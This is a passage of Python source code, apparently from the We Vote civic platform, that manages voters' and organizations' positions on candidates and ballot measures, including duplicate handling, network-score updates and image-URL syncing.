elif positive_value_exists(measure_we_vote_id):
results = self.retrieve_voter_contest_measure_position_with_we_vote_id(
voter_id, measure_we_vote_id)
is_public_position = results['is_public_position']
if results['position_found']:
voter_position_found = True
voter_position_on_stage = results['position']
elif results['MultipleObjectsReturned']:
problem_with_duplicate_in_same_table = True
status += "UPDATE_OR_CREATE_POSITION_COMMENT-MultipleObjectsReturned-MEASURE "
# merge_position_duplicates_voter_contest_measure_position_with_we_vote_id
retrieve_position_for_friends = not is_public_position
merge_results = self.merge_position_duplicates_voter_contest_measure_position_with_we_vote_id(
voter_id, measure_we_vote_id, retrieve_position_for_friends)
status += merge_results['status']
if merge_results['duplicates_repaired']:
problem_with_duplicate_in_same_table = False
results = self.retrieve_voter_contest_measure_position_with_we_vote_id(
voter_id, measure_we_vote_id)
status += results['status']
is_public_position = results['is_public_position']
if results['MultipleObjectsReturned']:
problem_with_duplicate_in_same_table = True
status += 'MultipleObjectsReturned-WORK_NEEDED3 '
voter_position_on_stage_found = False
position_we_vote_id = ''
if problem_with_duplicate_in_same_table:
results = {
'success': False,
'status': status,
'position_we_vote_id': position_we_vote_id,
'position': voter_position_on_stage,
'position_found': voter_position_on_stage_found,
'is_public_position': is_public_position,
}
return results
elif voter_position_found:
problem_with_duplicate = False
success = False
status = "UPDATE_OR_CREATE_POSITION_COMMENT-CHECKING_FOR_DUPLICATE"
try:
# Check for duplicate in other table
position_we_vote_id = ""
organization_id = 0
organization_we_vote_id = ""
contest_office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
retrieve_position_for_friends = True if is_public_position else False # Get the opposite
voter_we_vote_id = ""
duplicate_results = self.retrieve_position(position_we_vote_id,
organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
retrieve_position_for_friends,
voter_we_vote_id,
office_we_vote_id, candidate_we_vote_id, measure_we_vote_id)
if duplicate_results['position_found']:
problem_with_duplicate = True
success = False
status = 'UPDATE_OR_CREATE_POSITION_COMMENT-EXISTING_POSITION_CHECK_FAILED'
except Exception as e:
problem_with_duplicate = True
success = False
status = 'UPDATE_OR_CREATE_POSITION_COMMENT-EXISTING_POSITION_CHECK_FAILED-EXCEPTION'
if problem_with_duplicate:
results = {
'success': success,
'status': status,
'position_we_vote_id': position_we_vote_id,
'position': voter_position_on_stage,
'position_found': voter_position_found,
'is_public_position': is_public_position
}
return results
# Update this position with new values
try:
voter_position_on_stage.statement_text = statement_text
# Make sure a google_civic_election_id is stored
if not positive_value_exists(voter_position_on_stage.google_civic_election_id):
# We want to retrieve the google_civic_election_id from the ballot item object
if positive_value_exists(voter_position_on_stage.candidate_campaign_we_vote_id):
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(
voter_position_on_stage.candidate_campaign_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
voter_position_on_stage.google_civic_election_id = \
candidate_campaign.google_civic_election_id
if positive_value_exists(candidate_campaign.state_code):
voter_position_on_stage.state_code = candidate_campaign.state_code
elif positive_value_exists(voter_position_on_stage.contest_measure_we_vote_id):
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(
voter_position_on_stage.contest_measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
voter_position_on_stage.google_civic_election_id = contest_measure.google_civic_election_id
if positive_value_exists(contest_measure.state_code):
voter_position_on_stage.state_code = contest_measure.state_code
elif positive_value_exists(voter_position_on_stage.contest_office_we_vote_id):
contest_office_manager = ContestOfficeManager()
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(
voter_position_on_stage.contest_office_we_vote_id)
if results['contest_office_found']:
contest_office = results['contest_office']
voter_position_on_stage.google_civic_election_id = contest_office.google_civic_election_id
if positive_value_exists(contest_office.state_code):
voter_position_on_stage.state_code = contest_office.state_code
if voter_position_on_stage.candidate_campaign_we_vote_id:
if not positive_value_exists(voter_position_on_stage.candidate_campaign_id):
# Heal the data, and fill in the candidate_campaign_id
candidate_campaign_manager = CandidateCampaignManager()
voter_position_on_stage.candidate_campaign_id = \
candidate_campaign_manager.fetch_candidate_campaign_id_from_we_vote_id(
voter_position_on_stage.candidate_campaign_we_vote_id)
elif voter_position_on_stage.contest_measure_we_vote_id:
if not positive_value_exists(voter_position_on_stage.contest_measure_id):
# Heal the data, and fill in the contest_measure_id
contest_measure_manager = ContestMeasureManager()
voter_position_on_stage.contest_measure_id = \
contest_measure_manager.fetch_contest_measure_id_from_we_vote_id(
voter_position_on_stage.contest_measure_we_vote_id)
if not positive_value_exists(voter_position_on_stage.voter_we_vote_id):
# Heal the data: Make sure we have a voter_we_vote_id
voter_position_on_stage.voter_we_vote_id = fetch_voter_we_vote_id_from_voter_id(voter_id)
voter_position_on_stage.save()
position_list_manager.update_position_network_scores_for_one_position(voter_position_on_stage)
position_we_vote_id = voter_position_on_stage.we_vote_id
voter_position_on_stage_found = True
status = 'POSITION_COMMENT_UPDATED'
except Exception as e:
status = 'POSITION_COMMENT_COULD_NOT_BE_UPDATED'
else:
try:
# Create new
candidate_campaign_id = None
google_civic_election_id = 0
state_code = ''
ballot_item_display_name = ""
speaker_display_name = ""
if candidate_we_vote_id:
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(
candidate_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_id = candidate_campaign.id
google_civic_election_id = candidate_campaign.google_civic_election_id
state_code = candidate_campaign.state_code
ballot_item_display_name = candidate_campaign.candidate_name
contest_measure_id = None
if measure_we_vote_id:
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_id = contest_measure.id
google_civic_election_id = contest_measure.google_civic_election_id
state_code = contest_measure.state_code
ballot_item_display_name = contest_measure.measure_title
# In order to show a position publicly we need to tie the position to either organization_we_vote_id,
# public_figure_we_vote_id or candidate_we_vote_id. For now (2016-8-17) we assume organization
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_id(voter_id)
organization_id = 0
organization_we_vote_id = ""
voter_we_vote_id = ""
if results['voter_found']:
voter = results['voter']
voter_we_vote_id = voter.we_vote_id
organization_we_vote_id = voter.linked_organization_we_vote_id
if positive_value_exists(organization_we_vote_id):
# Look up the organization_id
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(
voter.linked_organization_we_vote_id)
if organization_results['organization_found']:
organization = organization_results['organization']
organization_id = organization.id
speaker_display_name = organization.organization_name
# Always default to Friends only
voter_position_on_stage = PositionForFriends(
voter_id=voter_id,
voter_we_vote_id=voter_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
candidate_campaign_we_vote_id=candidate_we_vote_id,
contest_measure_id=contest_measure_id,
contest_measure_we_vote_id=measure_we_vote_id,
stance=NO_STANCE,
google_civic_election_id=google_civic_election_id,
state_code=state_code,
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
statement_text=statement_text,
ballot_item_display_name=ballot_item_display_name,
speaker_display_name=speaker_display_name,
)
voter_position_on_stage.save()
position_list_manager.update_position_network_scores_for_one_position(voter_position_on_stage)
position_we_vote_id = voter_position_on_stage.we_vote_id
voter_position_on_stage_found = True
is_public_position = False
status = 'NEW_POSITION_COMMENT_SAVED'
except Exception as e:
status = 'NEW_POSITION_COMMENT_COULD_NOT_BE_SAVED'
results = {
'status': status,
'success': True if voter_position_on_stage_found else False,
'position_we_vote_id': position_we_vote_id,
'position': voter_position_on_stage,
'is_public_position': is_public_position
}
return results
def update_or_create_position_network_score(self, viewing_voter_id, viewing_voter_we_vote_id,
google_civic_election_id,
organization_we_vote_id, friend_voter_we_vote_id,
speaker_display_name,
candidate_we_vote_id, measure_we_vote_id,
support_or_oppose):
"""
:param viewing_voter_id: The voter who needs to see the network score
:param viewing_voter_we_vote_id: The voter who needs to see the network score
:param google_civic_election_id:
:param organization_we_vote_id: The organization with the public position (not used for friends-only positions)
:param friend_voter_we_vote_id: The friend sharing the friends-only position
:param speaker_display_name: The name of the friend or organization sharing the position
:param candidate_we_vote_id:
:param measure_we_vote_id:
:param support_or_oppose: True for support, False for oppose
:return:
"""
position_network_score_updated = False
new_position_network_score_created = False
status = ""
success = False
if not positive_value_exists(viewing_voter_id) or not positive_value_exists(viewing_voter_we_vote_id):
status += "UPDATE_OR_CREATE_POSITION_NETWORK_SCORE-MISSING_VOTER_ID "
results = {
'success': success,
'status': status,
'position_network_score_created': new_position_network_score_created,
'position_network_score_updated': position_network_score_updated,
}
return results
if positive_value_exists(support_or_oppose):
is_support = True
is_oppose = False
else:
is_support = False
is_oppose = True
# If we are saving the voter's own position, and they have a fabricated name, replace with "You"
if viewing_voter_we_vote_id and friend_voter_we_vote_id and viewing_voter_we_vote_id == friend_voter_we_vote_id:
if speaker_display_name.startswith("Voter-"):
speaker_display_name = "You"
try:
if positive_value_exists(organization_we_vote_id):
if positive_value_exists(candidate_we_vote_id):
defaults = {
'viewing_voter_id': viewing_voter_id,
'viewing_voter_we_vote_id': viewing_voter_we_vote_id,
'google_civic_election_id': google_civic_election_id,
'organization_we_vote_id': organization_we_vote_id,
'friend_voter_we_vote_id': None,
'speaker_display_name': speaker_display_name,
'candidate_we_vote_id': candidate_we_vote_id,
'measure_we_vote_id': None,
'is_support': is_support,
'is_oppose': is_oppose,
}
position_network_score, new_position_network_score_created = \
PositionNetworkScore.objects.update_or_create(
viewing_voter_id=viewing_voter_id,
organization_we_vote_id__iexact=organization_we_vote_id,
candidate_we_vote_id__iexact=candidate_we_vote_id,
defaults=defaults)
position_network_score_updated = True
success = True
elif positive_value_exists(measure_we_vote_id):
defaults = {
'viewing_voter_id': viewing_voter_id,
'viewing_voter_we_vote_id': viewing_voter_we_vote_id,
'google_civic_election_id': google_civic_election_id,
'organization_we_vote_id': organization_we_vote_id,
'friend_voter_we_vote_id': None,
'speaker_display_name': speaker_display_name,
'candidate_we_vote_id': None,
'measure_we_vote_id': measure_we_vote_id,
'is_support': is_support,
'is_oppose': is_oppose,
}
position_network_score, new_position_network_score_created = \
PositionNetworkScore.objects.update_or_create(
viewing_voter_id=viewing_voter_id,
organization_we_vote_id__iexact=organization_we_vote_id,
measure_we_vote_id__iexact=measure_we_vote_id,
defaults=defaults)
position_network_score_updated = True
success = True
else:
status += "UPDATE_OR_CREATE_POSITION_NETWORK_SCORE-ORG_MISSING_CANDIDATE_OR_MEASURE_ID "
position_network_score_updated = False
success = False
elif positive_value_exists(friend_voter_we_vote_id):
if positive_value_exists(candidate_we_vote_id):
defaults = {
'viewing_voter_id': viewing_voter_id,
'viewing_voter_we_vote_id': viewing_voter_we_vote_id,
'google_civic_election_id': google_civic_election_id,
'organization_we_vote_id': None,
'friend_voter_we_vote_id': friend_voter_we_vote_id,
'speaker_display_name': speaker_display_name,
'candidate_we_vote_id': candidate_we_vote_id,
'measure_we_vote_id': None,
'is_support': is_support,
'is_oppose': is_oppose,
}
position_network_score, new_position_network_score_created = \
PositionNetworkScore.objects.update_or_create(
viewing_voter_id=viewing_voter_id,
friend_voter_we_vote_id__iexact=friend_voter_we_vote_id,
candidate_we_vote_id__iexact=candidate_we_vote_id,
defaults=defaults)
position_network_score_updated = True
success = True
elif positive_value_exists(measure_we_vote_id):
defaults = {
'viewing_voter_id': viewing_voter_id,
'viewing_voter_we_vote_id': viewing_voter_we_vote_id,
'google_civic_election_id': google_civic_election_id,
'organization_we_vote_id': None,
'friend_voter_we_vote_id': friend_voter_we_vote_id,
'speaker_display_name': speaker_display_name,
'candidate_we_vote_id': None,
'measure_we_vote_id': measure_we_vote_id,
'is_support': is_support,
'is_oppose': is_oppose,
}
position_network_score, new_position_network_score_created = \
PositionNetworkScore.objects.update_or_create(
viewing_voter_id=viewing_voter_id,
friend_voter_we_vote_id__iexact=friend_voter_we_vote_id,
measure_we_vote_id__iexact=measure_we_vote_id,
defaults=defaults)
position_network_score_updated = True
success = True
else:
status += "UPDATE_OR_CREATE_POSITION_NETWORK_SCORE-FRIEND_MISSING_CANDIDATE_OR_MEASURE_ID "
position_network_score_updated = False
success = False
if position_network_score_updated:
status += 'POSITION_NETWORK_SCORE_SAVED '
else:
status += 'POSITION_NETWORK_SCORE_NOT_SAVED '
except Exception as e:
success = False
status += 'UNABLE_TO_UPDATE_OR_CREATE_POSITION_NETWORK_SCORE '
results = {
'success': success,
'status': status,
'position_network_score_created': new_position_network_score_created,
'position_network_score_updated': position_network_score_updated,
}
return results
def update_position_image_urls_from_candidate(self, position_object, candidate_campaign):
"""
Update position_object with candidate image urls
:param position_object:
:param candidate_campaign:
:return:
"""
values_changed = False
if positive_value_exists(candidate_campaign.candidate_photo_url()) and \
position_object.ballot_item_image_url_https != candidate_campaign.candidate_photo_url():
position_object.ballot_item_image_url_https = candidate_campaign.candidate_photo_url()
values_changed = True
if positive_value_exists(candidate_campaign.we_vote_hosted_profile_image_url_large) and \
position_object.ballot_item_image_url_https_large != \
candidate_campaign.we_vote_hosted_profile_image_url_large:
position_object.ballot_item_image_url_https_large = \
candidate_campaign.we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(candidate_campaign.we_vote_hosted_profile_image_url_medium) and \
position_object.ballot_item_image_url_https_medium != \
candidate_campaign.we_vote_hosted_profile_image_url_medium:
position_object.ballot_item_image_url_https_medium = \
candidate_campaign.we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(candidate_campaign.we_vote_hosted_profile_image_url_tiny) and \
position_object.ballot_item_image_url_https_tiny != \
candidate_campaign.we_vote_hosted_profile_image_url_tiny:
position_object.ballot_item_image_url_https_tiny = candidate_campaign.we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
try:
position_object.save()
success = True
status = "POSITION_OBJECT_SAVED"
except Exception as e:
success = False
status = 'POSITION_OBJECT_COULD_NOT_BE_SAVED'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_IMAGE_URLS"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def update_position_image_urls_from_organization(self, position_object, organization):
"""
Update position_object with organization image urls
:param position_object:
:param organization:
:return:
"""
values_changed = False
if positive_value_exists(organization.organization_photo_url()) and \
position_object.speaker_image_url_https != organization.organization_photo_url():
position_object.speaker_image_url_https = organization.organization_photo_url()
values_changed = True
if positive_value_exists(organization.we_vote_hosted_profile_image_url_large) and \
position_object.speaker_image_url_https_large != organization.we_vote_hosted_profile_image_url_large:
position_object.speaker_image_url_https_large = organization.we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(organization.we_vote_hosted_profile_image_url_medium) and \
position_object.speaker_image_url_https_medium != organization.we_vote_hosted_profile_image_url_medium:
position_object.speaker_image_url_https_medium = organization.we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(organization.we_vote_hosted_profile_image_url_tiny) and \
position_object.speaker_image_url_https_tiny != organization.we_vote_hosted_profile_image_url_tiny:
position_object.speaker_image_url_https_tiny = organization.we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
try:
position_object.save()
success = True
status = "SAVED_POSITION_IMAGE_URLS_FROM_ORGANIZATION"
except Exception as e:
success = False
status = 'NOT_SAVED_POSITION_IMAGE_URLS_FROM_ORGANIZATION'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_IMAGE_URLS"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def update_position_image_urls_from_voter(self, position_object, voter):
"""
Update position_object with voter image urls
:param position_object:
:param voter:
:return:
"""
values_changed = False
if positive_value_exists(voter.voter_photo_url()) and \
position_object.speaker_image_url_https != voter.voter_photo_url():
position_object.speaker_image_url_https = voter.voter_photo_url()
values_changed = True
if positive_value_exists(voter.we_vote_hosted_profile_image_url_large) and \
position_object.speaker_image_url_https_large != voter.we_vote_hosted_profile_image_url_large:
position_object.speaker_image_url_https_large = voter.we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(voter.we_vote_hosted_profile_image_url_medium) and \
position_object.speaker_image_url_https_medium != voter.we_vote_hosted_profile_image_url_medium:
position_object.speaker_image_url_https_medium = voter.we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(voter.we_vote_hosted_profile_image_url_tiny) and \
position_object.speaker_image_url_https_tiny != voter.we_vote_hosted_profile_image_url_tiny:
position_object.speaker_image_url_https_tiny = voter.we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
try:
position_object.save()
success = True
status = "SAVED_POSITION_IMAGE_URLS_FROM_VOTER"
except Exception as e:
success = False
status = 'NOT_SAVED_POSITION_IMAGE_URLS_FROM_VOTER'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_IMAGE_URLS"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def reset_position_image_details(self, position_object, ballot_item_image_url_https=None,
speaker_image_url_https=None):
"""
Reset Position image details as per we vote image details
:param position_object:
:param ballot_item_image_url_https:
:param speaker_image_url_https:
:return:
"""
position_change = False
if positive_value_exists(ballot_item_image_url_https):
position_object.ballot_item_image_url_https = ballot_item_image_url_https
position_object.ballot_item_image_url_https_large = ''
position_object.ballot_item_image_url_https_medium = ''
position_object.ballot_item_image_url_https_tiny = ''
position_change = True
if positive_value_exists(speaker_image_url_https):
position_object.speaker_image_url_https = speaker_image_url_https
position_object.speaker_image_url_https_large = ''
position_object.speaker_image_url_https_medium = ''
position_object.speaker_image_url_https_tiny = ''
position_change = True
if position_change:
position_object.save()
success = True
status = "RESET_POSITION_IMAGE_DETAILS"
else:
success = False
status = "NO_CHANGES_RESET_TO_POSITION_IMAGE_DETAILS"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def update_position_ballot_data_from_candidate(self, position_object, candidate_campaign):
"""
Update position_object with candidate data.
:param position_object:
:param candidate_campaign:
:return:
"""
position_change = False
if positive_value_exists(candidate_campaign.candidate_name) and \
position_object.ballot_item_display_name != candidate_campaign.candidate_name:
position_object.ballot_item_display_name = candidate_campaign.candidate_name
position_change = True
if positive_value_exists(candidate_campaign.candidate_twitter_handle) and \
position_object.ballot_item_twitter_handle != candidate_campaign.candidate_twitter_handle:
position_object.ballot_item_twitter_handle = candidate_campaign.candidate_twitter_handle
position_change = True
if position_change:
try:
position_object.save()
success = True
status = "SAVED_POSITION_BALLOT_DATA_FROM_CANDIDATE"
except Exception as e:
success = False
status = 'NOT_SAVED_POSITION_BALLOT_DATA_FROM_CANDIDATE'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_BALLOT_DATA"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def update_position_measure_data_from_contest_measure(self, position_object, contest_measure):
"""
Update position_object with measure data.
:param position_object:
:param candidate_campaign:
:return:
"""
position_change = False
if positive_value_exists(contest_measure.google_civic_measure_title) and \
position_object.google_civic_measure_title != contest_measure.google_civic_measure_title:
position_object.google_civic_measure_title = contest_measure.google_civic_measure_title
position_change = True
if positive_value_exists(contest_measure.we_vote_id) and \
position_object.contest_measure_we_vote_id != contest_measure.we_vote_id:
position_object.contest_measure_we_vote_id = contest_measure.we_vote_id
position_change = True
if positive_value_exists(contest_measure.id) and \
position_object.contest_measure_id != contest_measure.id:
position_object.contest_measure_id = contest_measure.id
position_change = True
if position_change:
try:
position_object.save()
success = True
status = "SAVED_POSITION_MEASURE_DATA_FROM_CONTEST_MEASURE"
except Exception as e:
success = False
status = 'NOT_SAVED_POSITION_MEASURE_DATA_FROM_CONTEST_MEASURE'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_MEASURE_DATA"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def update_position_office_data_from_contest_office(self, position_object, contest_office):
"""
Update position_object with office data.
:param position_object:
:param candidate_campaign:
:return:
"""
position_change = False
if positive_value_exists(contest_office.office_name) and \
position_object.contest_office_name != contest_office.office_name:
position_object.contest_office_name = contest_office.office_name
position_change = True
if positive_value_exists(contest_office.we_vote_id) and \
position_object.contest_office_we_vote_id != contest_office.we_vote_id:
position_object.contest_office_we_vote_id = contest_office.we_vote_id
position_change = True
if positive_value_exists(contest_office.id) and \
position_object.contest_office_id != contest_office.id:
position_object.contest_office_id = contest_office.id
position_change = True
if position_change:
try:
position_object.save()
success = True
status = "SAVED_POSITION_OFFICE_DATA_FROM_CONTEST_OFFICE"
except Exception as e:
success = False
status = 'NOT_SAVED_POSITION_OFFICE_DATA_FROM_CONTEST_OFFICE'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_OFFICE_DATA"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
def update_position_speaker_data_from_organization(self, position_object, organization):
"""
Update position_object with organization data.
:param position_object:
:param organization:
:return:
"""
position_list_manager = PositionListManager()
position_change = False
if positive_value_exists(organization.organization_name) and \
position_object.speaker_display_name != organization.organization_name:
position_object.speaker_display_name = organization.organization_name
position_change = True
if positive_value_exists(organization.organization_twitter_handle) and \
position_object.speaker_twitter_handle != organization.organization_twitter_handle:
position_object.speaker_twitter_handle = organization.organization_twitter_handle
position_change = True
if position_change:
try:
position_object.save()
position_list_manager.update_position_network_scores_for_one_position(position_object)
success = True
status = "SAVED_POSITION_SPEAKER_DATA_FROM_ORGANIZATION"
except Exception as e:
success = False
status = 'NOT_SAVED_POSITION_SPEAKER_DATA_FROM_ORGANIZATION'
else:
success = True
status = "NO_CHANGES_SAVED_TO_POSITION_SPEAKER_DATA"
results = {
'success': success,
'status': status,
'position': position_object
}
return results
# We rely on this unique identifier: position_we_vote_id
# Pass in a value if we want it saved. Pass in "False" if we want to leave it the same.
def update_or_create_position(
self, position_we_vote_id,
organization_we_vote_id=False,
public_figure_we_vote_id=False,
voter_we_vote_id=False,
google_civic_election_id=False,
state_code=False,
ballot_item_display_name=False,
office_we_vote_id=False,
candidate_we_vote_id=False,
measure_we_vote_id=False,
stance=False,
set_as_public_position=False,
statement_text=False,
statement_html=False,
more_info_url=False,
vote_smart_time_span=False,
vote_smart_rating_id=False,
vote_smart_rating=False,
vote_smart_rating_name=False):
"""
Either update or create a position entry.
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
failed_saving_existing_position = False
position_on_stage_found = False
new_position_created = False
too_many_unique_actor_variables_received = False
no_unique_actor_variables_received = False
too_many_unique_ballot_item_variables_received = False
no_unique_ballot_item_variables_received = False
if set_as_public_position:
position_on_stage_starter = PositionEntered
position_on_stage = PositionEntered()
else:
position_on_stage_starter = PositionForFriends
position_on_stage = PositionForFriends()
status = "ENTERING_UPDATE_OR_CREATE_POSITION "
position_manager = PositionManager()
position_list_manager = PositionListManager()
# In order of authority
# 1) position_id exists? Find it with position_id or fail (REMOVED)
# 2) we_vote_id exists? Find it with we_vote_id or fail
# 3-5) organization_we_vote_id related position?
# 6-8) public_figure_we_vote_id related position?
# 9-11) voter_we_vote_id related position?
success = False
if positive_value_exists(position_we_vote_id):
# If here, we know we are updating
# 1) position_id exists? Find it with position_id or fail REMOVED
# 2) we_vote_id exists? Find it with we_vote_id or fail
position_results = {
'success': False,
}
found_with_we_vote_id = False
if positive_value_exists(position_we_vote_id):
position_results = position_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
found_with_we_vote_id = True
if position_results['success']:
position_on_stage = position_results['position']
position_on_stage_found = True
if organization_we_vote_id:
position_on_stage.organization_we_vote_id = organization_we_vote_id
# Lookup organization_id based on organization_we_vote_id and update
organization_manager = OrganizationManager()
position_on_stage.organization_id = \
organization_manager.fetch_organization_id(organization_we_vote_id)
if google_civic_election_id:
position_on_stage.google_civic_election_id = google_civic_election_id
if state_code:
position_on_stage.state_code = state_code
if ballot_item_display_name:
position_on_stage.ballot_item_display_name = ballot_item_display_name
if office_we_vote_id:
position_on_stage.contest_office_we_vote_id = office_we_vote_id
# Lookup contest_office_id based on office_we_vote_id and update
contest_office_manager = ContestOfficeManager()
position_on_stage.contest_office_id = \
contest_office_manager.fetch_contest_office_id_from_we_vote_id(office_we_vote_id)
if candidate_we_vote_id:
position_on_stage.candidate_campaign_we_vote_id = candidate_we_vote_id
# Lookup candidate_campaign_id based on candidate_campaign_we_vote_id and update
candidate_campaign_manager = CandidateCampaignManager()
position_on_stage.candidate_campaign_id = \
candidate_campaign_manager.fetch_candidate_campaign_id_from_we_vote_id(candidate_we_vote_id)
if measure_we_vote_id:
position_on_stage.contest_measure_we_vote_id = measure_we_vote_id
# Lookup contest_measure_id based on contest_measure_we_vote_id and update
contest_measure_manager = ContestMeasureManager()
position_on_stage.contest_measure_id = \
contest_measure_manager.fetch_contest_measure_id_from_we_vote_id(measure_we_vote_id)
# if positive_value_exists(stance):
if stance:
# TODO Verify that "stance" contains a legal value
position_on_stage.stance = stance
if statement_text:
position_on_stage.statement_text = statement_text
if statement_html:
position_on_stage.statement_html = statement_html
if more_info_url:
position_on_stage.more_info_url = more_info_url
if vote_smart_time_span:
position_on_stage.vote_smart_time_span = vote_smart_time_span
if vote_smart_rating_id:
position_on_stage.vote_smart_rating_id = vote_smart_rating_id
if vote_smart_rating:
position_on_stage.vote_smart_rating = vote_smart_rating
if vote_smart_rating_name:
position_on_stage.vote_smart_rating_name = vote_smart_rating_name
# As long as at least one of the above variables has changed, then save
if organization_we_vote_id or google_civic_election_id or state_code or ballot_item_display_name or \
office_we_vote_id or candidate_we_vote_id or measure_we_vote_id or stance or statement_text \
or statement_html or more_info_url \
or vote_smart_time_span or vote_smart_rating_id or vote_smart_rating or vote_smart_rating_name:
position_on_stage.save()
position_list_manager.update_position_network_scores_for_one_position(position_on_stage)
success = True
if found_with_we_vote_id:
status = "POSITION_SAVED_WITH_POSITION_WE_VOTE_ID"
else:
status = "POSITION_CHANGES_SAVED"
else:
success = True
if found_with_we_vote_id:
status = "NO_POSITION_CHANGES_SAVED_WITH_POSITION_WE_VOTE_ID"
else:
status = "NO_POSITION_CHANGES_SAVED"
else:
status = "POSITION_COULD_NOT_BE_FOUND_WITH_POSITION_ID_OR_WE_VOTE_ID"
# else for this: if positive_value_exists(position_we_vote_id):
else:
# We also want to retrieve a position with the following sets of variables:
# 3) organization_we_vote_id, google_civic_election_id, candidate_we_vote_id: DONE
# 4) organization_we_vote_id, google_civic_election_id, measure_we_vote_id: DONE
# 5) organization_we_vote_id, google_civic_election_id, office_we_vote_id: DONE
# 6) TODO public_figure_we_vote_id, google_civic_election_id, office_we_vote_id
# 7) TODO public_figure_we_vote_id, google_civic_election_id, candidate_we_vote_id
# 8) TODO public_figure_we_vote_id, google_civic_election_id, measure_we_vote_id
# NOTE: Voters storing a public version of their voter guides store it as a public_figure_we_vote_id
# 9) voter_we_vote_id, google_civic_election_id, office_we_vote_id
# 10) voter_we_vote_id, google_civic_election_id, candidate_we_vote_id
# 11) voter_we_vote_id, google_civic_election_id, measure_we_vote_id
found_with_status = ''
# Make sure that too many ballot item identifier variables weren't passed in
number_of_unique_ballot_item_identifiers = 0
if positive_value_exists(candidate_we_vote_id):
number_of_unique_ballot_item_identifiers += 1
if positive_value_exists(measure_we_vote_id):
number_of_unique_ballot_item_identifiers += 1
if positive_value_exists(office_we_vote_id):
number_of_unique_ballot_item_identifiers += 1
if number_of_unique_ballot_item_identifiers > 1:
too_many_unique_ballot_item_variables_received = True
status = "FAILED-TOO_MANY_UNIQUE_BALLOT_ITEM_VARIABLES "
success = False
elif number_of_unique_ballot_item_identifiers is 0:
no_unique_ballot_item_variables_received = True
status = "FAILED-NO_UNIQUE_BALLOT_ITEM_VARIABLES_RECEIVED "
success = False
# Make sure that too many "actor" identifier variables weren't passed in
number_of_unique_actor_identifiers = 0
if positive_value_exists(organization_we_vote_id):
number_of_unique_actor_identifiers += 1
if positive_value_exists(public_figure_we_vote_id):
number_of_unique_actor_identifiers += 1
if positive_value_exists(voter_we_vote_id):
number_of_unique_actor_identifiers += 1
if number_of_unique_actor_identifiers > 1:
too_many_unique_actor_variables_received = True
status = "FAILED-TOO_MANY_UNIQUE_ACTOR_VARIABLES "
success = False
elif number_of_unique_actor_identifiers is 0:
no_unique_actor_variables_received = True
status = "FAILED-NO_UNIQUE_ACTOR_VARIABLES_RECEIVED "
success = False
# Only proceed if the correct number of unique identifiers was received
if not too_many_unique_ballot_item_variables_received and \
not too_many_unique_actor_variables_received and \
not no_unique_actor_variables_received and \
not no_unique_ballot_item_variables_received:
# 3-5: Organization-related cases
# 3) candidate_we_vote_id + organization_we_vote_id exists? Try to find it. If not, go to step 4
if positive_value_exists(candidate_we_vote_id) and \
positive_value_exists(organization_we_vote_id) and \
positive_value_exists(google_civic_election_id):
try:
organization_id = 0
# organization_we_vote_id = ""
voter_id = 0
office_id = 0
voter_we_vote_id = ""
office_we_vote_id = ""
candidate_id = 0
# candidate_we_vote_id = ""
measure_id = 0
measure_we_vote_id = ""
# google_civic_election_id = 0
results = position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id,
voter_id,
office_id, candidate_id,
measure_id,
voter_we_vote_id,
office_we_vote_id,
candidate_we_vote_id,
measure_we_vote_id,
google_civic_election_id)
if results['position_found']:
position_on_stage = results['position']
position_on_stage_found = True
found_with_status = "FOUND_WITH_CANDIDATE_AND_ORGANIZATION_WE_VOTE_ID "
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
status = "FAILED-MULTIPLE_FOUND_WITH_CANDIDATE_AND_ORGANIZATION_WE_VOTE_ID "
except ObjectDoesNotExist as e:
# Not a problem -- a position matching this candidate_we_vote_id wasn't found
pass
# If there wasn't a google_civic_election_id, look for vote_smart_time_span
elif positive_value_exists(candidate_we_vote_id) and \
positive_value_exists(organization_we_vote_id) and \
